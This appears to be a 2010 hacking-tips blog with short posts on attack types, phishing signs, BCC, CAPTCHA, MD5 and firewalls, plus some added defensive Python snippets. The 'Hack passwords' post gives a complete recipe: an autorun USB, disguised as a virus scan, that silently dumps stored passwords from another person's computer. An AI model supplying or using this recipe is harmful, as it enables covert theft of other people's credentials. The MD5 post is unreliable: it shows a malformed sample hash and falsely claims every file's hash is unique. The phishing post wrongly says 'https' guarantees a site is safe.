
Thursday, September 30, 2010

+ Hacking Types


There are many types of hacking. I wish to describe some of them and what they do.

1)Trojan Horses:
A Trojan horse is the best and easiest way to break in to your PC. Usually a hacker sends a Trojan by binding it with another, genuine program; by doing this it tries to hide from your anti-virus.
When the user opens the program, the Trojan executes first and opens a backdoor for the hacker.

2) Viruses and Worms:
Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines (worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.

3) Back Doors:
Hackers can gain access to a network by exploiting back doors: administrative shortcuts, configuration errors, easily deciphered passwords, and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in your network.

4) Rogue Access Points:
Rogue access points (APs) are unsecured wireless access points that outsiders can easily breach.

5) Denial of Service:
DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic (which can be e-mail or Transmission Control Protocol, TCP, packets).

Distributed DoSs (DDoSs) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP addresses.

6) Anarchists, Crackers, and Kiddies:
Who are these people, and why are they attacking your network?
Anarchists are people who just like to break stuff. They usually exploit any target of opportunity.

Crackers are hobbyists or professionals who break passwords and develop Trojan horses or other SW (called warez). They either use the SW themselves (for bragging rights) or sell it for profit.

Script kiddies are hacker wannabes. They have no real hacker skills, so they buy or download warez, which they launch.

Other attackers include disgruntled employees, terrorists, political operatives, or anyone else who feels slighted, exploited, ripped off, or unloved.

7) Sniffing and Spoofing:
Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.

Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping.

And there are many more types, which we will discuss later.

+ Hack passwords

Here is a small trick with which you can sniff passwords stored in a computer. To do so you need some utilities:

Description

MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby
MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the “remember your password” option in one of the above programs.

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.

Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.

IE PassView is a small password management utility that reveals the passwords stored by Internet Explorer Web browser, and allows you to delete passwords that you don’t need anymore. It supports all versions of Internet Explorer, from version 4.0 and up to 8.0.

Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:
  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
HOW TO DO IT:
1. Download all 5 tools, extract them and copy only the executables (.exe files) onto your USB pendrive.
i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe onto your USB drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Save the file and rename it from New Text Document.txt to autorun.inf.
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the file and rename it from New Text Document.txt to launch.bat.

Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on any computer to sniff the stored passwords. Just follow these steps:

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
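
For defenders, the two files in the procedure above are easy to recognise on a removable drive. The following check is an added example, not part of the original post: it parses autorun.inf for entries that launch a program and looks in the launched batch file for the tools named above run with the /stext export switch. The function names and findings text are illustrative.

```python
import configparser
from pathlib import Path

# File types that execute when named in an [autorun] open=/shellexecute= entry.
RUNNABLE = (".bat", ".cmd", ".exe", ".com", ".scr", ".vbs", ".js", ".ps1")
# Tool names listed in the post; /stext is the export switch its batch file uses.
RECOVERY_TOOLS = {"mspass.exe", "mailpv.exe", "iepv.exe", "pspv.exe", "passwordfox.exe"}


def audit_autorun(text):
    """Return (findings, launch_targets) for the text of an autorun.inf."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    try:
        cp.read_string(text)
    except configparser.Error as exc:
        return [f"autorun.inf could not be parsed: {type(exc).__name__}"], []
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    if section is None:
        return [], []
    findings, targets = [], []
    for key in ("open", "shellexecute"):
        value = (cp[section].get(key) or "").strip()
        program = value.split()[0] if value else ""
        if program.lower().endswith(RUNNABLE):
            findings.append(f"{key}= launches {program}")
            targets.append(program)
    label = (cp[section].get("action") or "").strip()
    if label and targets:
        findings.append(f"drive supplies its own AutoPlay label: {label!r}")
    return findings, targets


def audit_batch(text):
    """Return the recovery tools a batch file runs with the /stext switch."""
    hits = []
    for line in text.splitlines():
        words = line.lower().split()
        hits += [w for w in words if w in RECOVERY_TOOLS and "/stext" in words]
    return hits


def audit_drive(root):
    """Audit the root directory of a mounted removable drive."""
    files = {p.name.lower(): p for p in Path(root).iterdir() if p.is_file()}
    if "autorun.inf" not in files:
        return []
    findings, targets = audit_autorun(files["autorun.inf"].read_text(errors="replace"))
    for target in targets:
        script = files.get(target.lower())
        if script and script.suffix.lower() in (".bat", ".cmd"):
            for tool in audit_batch(script.read_text(errors="replace")):
                findings.append(f"{script.name} exports stored passwords with {tool} /stext")
    return findings


# Sample inputs: the autorun.inf from the post and two lines of its launch.bat.
SAMPLE_INF = "[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n"
SAMPLE_BAT = "start mspass.exe /stext mspass.txt\nstart iepv.exe /stext iepv.txt\n"

if __name__ == "__main__":
    print(audit_autorun(SAMPLE_INF)[0])
    print(audit_batch(SAMPLE_BAT))
```

Run `audit_drive` against the root of a mounted drive before opening anything on it. Turning off AutoRun for removable media in Windows policy removes the trigger this check looks for.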

+ What is Phishing..?

In general, phishing is a fraudulent attempt, usually made through email, to steal your personal information.
Phishing emails usually appear to come from a well-known organization and ask for your personal information — such as credit card number, social security number, account number or password. Often times phishing attempts appear to come from sites, services and companies with which you do not even have an account.



HOW TO DETECT PHISHING:
It’s very easy if you are careful, and it’s also very hard if you are not.
  1. Generic greeting. Phishing emails are usually sent in large batches. To save time, Internet criminals use generic names like “First Generic Bank Customer” so they don’t have to type all recipients’ names out and send emails one-by-one. If you don’t see your name, be suspicious.
  2. Forged link. Even if a link has a name you recognize somewhere in it, it doesn’t mean it links to the real organization. Roll your mouse over the link and see if it matches what appears in the email. If there is a discrepancy, don’t click on the link. Also, websites where it is safe to enter personal information begin with “https” — the “s” stands for secure. If you don’t see “https” do not proceed.
  3. Requests personal information. The point of sending phishing email is to trick you into providing your personal information. If you receive an email requesting your personal information, it is probably a phishing attempt.
  4. Sense of urgency. Internet criminals want you to provide your personal information now. They do this by making you think something has happened that requires you to act fast. The faster they get your information, the faster they can move on to another victim.
Here is a small example of phishing, using lookalike addresses like these:
www.micosoft.com
www.mircosoft.com
www.verify-microsoft.com
instead of www.microsoft.com

How to identify a fraudulent e-mail?
Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”
Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”
These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”
Phishing e-mail messages are usually sent out in bulk and often do not contain your first or last name.

“Click the link below to gain access to your account.”
HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

Notice in the following example that resting the mouse pointer on the link reveals the real Web address, as shown in the box with the yellow background. The string of cryptic numbers looks nothing like the company’s Web address, which is a suspicious sign.

So the bottom line for defending against phishing attacks is:
1. Never assume that an email is valid based on the sender’s email address.
2. A trusted bank/organization such as PayPal will never ask you for your full name and password in a PayPal email.
3. An email from trusted organization will never contain attachments or software.
4. Clicking on a link in an email is the most insecure way to get to your account.

+ How To Use BCC Email Field

What is BCC?
BCC, which stands for blind carbon copy, allows you to hide recipients in email messages. Unlike addresses in the To: field or the CC: (carbon copy) field, addresses in the BCC: field cannot be seen by other users.

Why would you want to use BCC?

There are a few main reasons for using BCC:
Privacy – Sometimes it’s beneficial, even necessary, for you to let recipients know who else is receiving your email message. However, there may be instances when you want to send the same message to multiple recipients without letting them know who else is receiving the message. If you are sending email on behalf of a business or organization, it may be especially important to keep lists of clients, members, or associates confidential. You may also want to avoid listing an internal email address on a message being sent to external recipients.

Another point to remember is that if you use the To: or CC: fields to list all of your recipients, these same recipients will also receive any replies to your message unless the sender removes them. If there is potential for a response that is not appropriate for all recipients, consider using BCC.

Tracking – Maybe you want to access or archive the email message you are sending at another email account. Or maybe you want to make someone, such as a supervisor or team member, aware of the email without actually involving them in the exchange. BCC allows you to accomplish these goals without advertising that you are doing it.

Respect for your recipients – Forwarded email messages frequently contain long lists of email addresses that were CC’d by previous senders. These addresses are highly likely to be active and valid, so they are very valuable to spammers. Furthermore, many email-borne viruses harvest email addresses contained in messages you’ve already received (not just the To: and From: fields, but from the body, too), so those long lists in forwarded messages pose a risk to all the accounts they point to if you get infected.

Many people frequently forward messages to their entire address books using CC. Encourage people who forward messages to you to use BCC so that your email address is less likely to appear in other people’s inboxes and be susceptible to being harvested. To avoid becoming part of the problem, in addition to using BCC if you forward messages, take time to remove all existing email addresses within the message. The additional benefit is that the people you’re sending the message to will appreciate not having to scroll through large sections of irrelevant information to get to the actual message.

How do you BCC an email message?

Most email clients have the option to BCC listed a few lines below the To: field. However, sometimes it is a separate option that is not listed by default. If you cannot locate it, check the help menu or the software’s documentation.

If you want to BCC all recipients and your email client will not send a message without something in the To: field, consider using your own email address in that field. In addition to hiding the identity of other recipients, this option will enable you to confirm that the message was sent successfully.

+ What is CAPTCHA and How it works…?

INTRODUCTION

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer.

Put simply, CAPTCHA is a word verification test to show that you are a human and not a bot. You can see CAPTCHA tests on almost all sign-up forms and forums, and they are also sometimes requested when you submit comments, etc.

What Purpose Does CAPTCHA Serve Exactly?
The purpose of CAPTCHA is mainly to stop activity from bots (automated software).

Thus you have to prove that you are a human before you sign up, etc.

WHY SHOULD THEY STOP BOTS (automated software)?

As said above, bots are automated software that will send unlimited requests (for sign-up, comments, etc.) to the destination server and crash it, so real users cannot get access to that site or forum. Thus CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail.

CHARACTERISTIC
A CAPTCHA is a means of automatically generating new challenges which:
  • Current software is unable to solve accurately.
  • Most humans can solve
  • Does not rely on the type of CAPTCHA being new to the attacker.

CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are struck out or presented with a noisy background to make it even harder for computers to figure out the patterns.
Although a checkbox “check here if you are not a bot” might serve to distinguish between humans and computers, it is not a CAPTCHA because it relies on the fact that an attacker has not spent effort to break that specific form. (Such ‘check here’ methods are very easy to defeat.) Instead, CAPTCHAs rely on difficult problems in artificial intelligence. In the short term, this has the benefit of distinguishing humans from computers.

As said above, CAPTCHAs are not only visual tests; there are many other methods, like:
Asking a mathematical equation like 1+1=?

OR
A user is presented with 4 images, of which 3 contain pictures of lions and one contains a cheetah. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but is almost impossible for a computer.

OR
Asking some “common sense” questions (“what color is the sky on a clear day”) with some options given below, which may be scrambled each time.

Breaking the CAPTCHA

However, there is no universal algorithm that could pass through and break any CAPTCHA system, and hence each CAPTCHA algorithm has to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.
There are a few approaches to defeating CAPTCHAs:
  • exploiting bugs in the implementation that allow the attacker to completely bypass the CAPTCHA,
  • improving character recognition software, or
  • using cheap human labor to process the test.

+ What is MD5 hash..?

MD5 hash: I think you have all heard this term quite often, but most people don’t know what it is and why it exists.

OK, I am not going into the detailed workings of MD5 because it is somewhat hard to understand; rather, I will describe its use in daily life.

In cryptography, MD5 (Message-Digest algorithm 5) is a widely used cryptographic hash function with a 128-bit hash value. MD5 has been employed in a wide variety of security applications, and is also commonly used to check the integrity of files. …

The MD5 algorithm was developed by RSA Data Security, Inc.

MD5 is a one-way hash algorithm that takes any length of data and produces a 128 bit “fingerprint” or “message digest”. This fingerprint is “non-reversible”.

Now let’s check out the use of an MD5 hash with an example.

Let’s suppose I had kept a ‘back up’ of my PC on a ‘file sharing site’ and I intended to download it for some reason after some days.

I successfully downloaded that ‘back up’ file and deleted the file in my ‘ONLINE FILE SHARING ACCOUNT’.

Now I tried to install that “back up”, but it won’t install (saying there is an error).

Why did that happen? There may be many reasons for it, like an unstable internet connection, hackers, download managers, the file being tampered with by a virus infection, etc.

Whatever the reason is, I lost my “back up”.

Here comes the MD5 hash.

Every file comes with an MD5 hash string. An MD5 hash is nothing but a 32 digit hexadecimal number which can be something as follows

” e25f2d85g2fjet22f52d22f5e5f8a8dj “

This hash is unique for every file irrespective of its size and type. That means two files with the same size will not have the same MD5 hash even though they are of same type and size. So MD5 hash can be used to uniquely identify a file.

How to use MD5 hash to check integrity of files..?

Before you download a file, first check the “MD5 hash” of that file on the server (there are many online sites for this and also many free MD5 programs). Note down the hash, and after the file has been downloaded, check the MD5 hash of that file again. If the two are the same, the file is not corrupted and is in the right condition; if the two are not the same then it is ****
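
The note-then-recheck procedure above, as an added example that is not part of the original post. It assumes the site publishes checksums as "digest  filename" lines (the layout md5sum-style tools produce); the function names and the backup.zip file are made up for the demonstration. The same routine accepts "sha256" as the algorithm where a site publishes that instead.

```python
import hashlib
import hmac
import re
import tempfile
from pathlib import Path


def file_digest(path, algorithm="md5", chunk_size=1 << 20):
    """Hash a file in chunks so a large download need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_checksums(text, algorithm="md5"):
    """Parse published 'digest  filename' lines into {filename: digest}."""
    width = hashlib.new(algorithm).digest_size * 2   # 32 hex digits for MD5
    table = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        digest, _, name = line.strip().partition(" ")
        digest, name = digest.lower(), name.strip().lstrip("*")
        # Reject anything that is not exactly the right number of hex digits.
        if not re.fullmatch(rf"[0-9a-f]{{{width}}}", digest) or not name:
            raise ValueError(f"malformed checksum line: {line!r}")
        table[name] = digest
    return table


def verify(path, published, algorithm="md5"):
    """Return 'ok', 'mismatch' or 'unlisted' for one downloaded file."""
    expected = published.get(Path(path).name)
    if expected is None:
        return "unlisted"
    actual = file_digest(path, algorithm)
    return "ok" if hmac.compare_digest(actual, expected) else "mismatch"


def demo():
    """Constructed data: note the digest, then re-check after a 1-byte change."""
    with tempfile.TemporaryDirectory() as d:
        backup = Path(d) / "backup.zip"
        backup.write_bytes(b"hello world")
        published = parse_checksums(f"{file_digest(backup)}  backup.zip\n")
        before = verify(backup, published)
        backup.write_bytes(b"hello_world")   # same size, one byte different
        after = verify(backup, published)
        return before, after


if __name__ == "__main__":
    print(demo())
```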

I hope this helps, PASS YOUR COMMENTS

+ What is a FIREWALL ?

A firewall is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices which is configured to permit or deny computer applications based upon a set of rules and other criteria.

Firewalls can be implemented in either hardware or software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.

There are several types of firewall techniques:

1. Packet filter: Packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules. Although difficult to configure, it is fairly effective and mostly transparent to its users. It is susceptible to IP spoofing.

2. Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.

3. Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.

4. Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.
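
Why a packet filter that trusts source addresses is susceptible to IP spoofing, and the ingress check that closes the gap, shown as an added example that is not part of the original post. The rule set, addresses, interface names and the 10.0.0.0/8 internal range are all constructed for illustration.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional

INTERNAL = ipaddress.ip_network("10.0.0.0/8")  # assumed protected network


@dataclass(frozen=True)
class Packet:
    iface: str   # interface the packet arrived on: "wan" or "lan"
    src: str
    dst: str
    proto: str
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str            # "accept" or "reject"
    src: str               # source network in CIDR form
    dst: str               # destination network in CIDR form
    proto: str
    dport: Optional[int]   # None matches any port

    def matches(self, p):
        return (ipaddress.ip_address(p.src) in ipaddress.ip_network(self.src)
                and ipaddress.ip_address(p.dst) in ipaddress.ip_network(self.dst)
                and p.proto == self.proto
                and self.dport in (None, p.dport))


# Constructed rule set, evaluated top to bottom; anything unmatched is rejected.
RULES = [
    Rule("accept", "10.0.0.0/8", "10.0.5.20/32", "tcp", 22),   # LAN admins -> SSH host
    Rule("accept", "0.0.0.0/0", "10.0.5.10/32", "tcp", 443),   # anyone -> web server
]


def filter_packet(p, rules=RULES, ingress_check=False):
    """Return (action, reason) for one packet, first matching rule wins."""
    # Ingress check: an internal source address can never legitimately
    # arrive on the external interface, whatever the rules say.
    if ingress_check and p.iface == "wan" and ipaddress.ip_address(p.src) in INTERNAL:
        return "reject", "internal source address arrived on external interface"
    for n, rule in enumerate(rules, 1):
        if rule.matches(p):
            return rule.action, f"rule {n}"
    return "reject", "default"


# Constructed packets.
LAN_ADMIN = Packet("lan", "10.0.0.99", "10.0.5.20", "tcp", 22)
SPOOFED = Packet("wan", "10.0.0.99", "10.0.5.20", "tcp", 22)    # claims a LAN source
OUTSIDER = Packet("wan", "198.51.100.7", "10.0.5.20", "tcp", 22)
WEB = Packet("wan", "198.51.100.7", "10.0.5.10", "tcp", 443)

if __name__ == "__main__":
    for pkt in (LAN_ADMIN, SPOOFED, OUTSIDER, WEB):
        print(pkt.iface, pkt.src, filter_packet(pkt), filter_packet(pkt, ingress_check=True))
```

Without the ingress check the rules alone accept SPOOFED under rule 1, because the filter sees only the claimed source address; with it, the same packet is rejected while LAN_ADMIN and WEB are unaffected.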

FUNCTION

A firewall is a dedicated appliance, or software running on a computer, which inspects network traffic passing through it, and denies or permits passage based on a set of rules/criteria.

It is normally placed between a protected network and an unprotected network and acts like a gate to protect assets to ensure that nothing private goes out and nothing malicious comes in.

A firewall’s basic task is to regulate some of the flow of traffic between computer networks of different trust levels. Typical examples are the Internet which is a zone with no trust and an internal network which is a zone of higher trust. A zone with an intermediate trust level, situated between the Internet and a trusted internal network, is often referred to as a “perimeter network” or Demilitarized zone (DMZ).

A firewall’s function within a network is similar to physical firewalls with fire doors in building construction. In the former case, it is used to prevent network intrusion to the private network. In the latter case, it is intended to contain and delay structural fire from spreading to adjacent structures.